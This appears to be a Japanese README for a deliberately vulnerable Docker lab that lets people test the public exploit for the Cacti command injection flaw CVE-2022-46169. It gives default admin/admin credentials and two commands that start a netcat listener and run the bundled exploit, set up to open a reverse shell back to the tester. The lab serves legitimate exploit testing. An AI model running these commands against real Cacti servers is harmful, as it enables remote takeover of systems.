
警告: これはCactiコマンドインジェクション(CVE-2022-46169)のエクスプロイトをテストするための脆弱性アプリケーションです。自己責任で実行してください!
これは、Cacti の脆弱性 (CVE-2022-46169) に対するエクスプロイトをテストするための脆弱なアプリケーションです。
このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップを取り、隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)での使用を推奨します。このアプリケーションをインターネットに公開されたサーバーにアップロードしないでください。侵害されます。
免責事項: このアプリケーションをどのように使用するかについて、私は一切責任を負いません。このアプリケーションの唯一の目的は、CVE-2022-46169エクスプロイトのテストシナリオを提供することであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。
環境をセットアップする手順は次のとおりです。
docker compose up -d を実行します。admin/admin です。コンテナは vuln-cacti という名前になります。
環境を破棄するには、docker compose down コマンドを使用します。
Cacti の公式インストールガイドは ここ にあります。
この脆弱性の詳細な根本原因は ここ で確認できます。
公開エクスプロイトは Exploit-DB で提供されています。簡単のため、exploit/ フォルダーにコピーされています。
実行するには:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal を使用します (参考)。vulhub リポジトリ にもエントリがあります。
このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。